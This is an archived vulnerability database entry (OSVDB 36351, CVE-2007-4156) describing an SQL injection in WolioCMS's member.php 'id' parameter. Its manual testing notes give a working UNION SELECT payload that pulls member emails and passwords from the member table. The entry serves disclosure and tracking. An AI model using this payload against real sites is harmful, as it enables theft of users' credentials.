WolioCMS member.php page Action id Variable SQL Injection

2007-07-30T00:00:00
ID OSVDB:36351
Type osvdb
Reporter k1tk4t(k1k4t@newhack.org)
Modified 2007-07-30T00:00:00

Description

Technical Description

This vulnerability is only present when the magic_quotes_gpc PHP option is 'off'.

Manual Testing Notes

http://[target]/_woliocms/member.php?member=admin&act=page&id='//UNION//ALL//SELECT//null,null,concat(member_email,'-',member_password),null,null,null,null,null,null,null//FROM//member/*

References:

Secunia Advisory ID:26270 Related OSVDB ID: 36352 Other Advisory URL: http://milw0rm.com/exploits/4246 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-07/0360.html ISS X-Force ID: 35678 FrSIRT Advisory: ADV-2007-2726 CVE-2007-4156 Bugtraq ID: 25134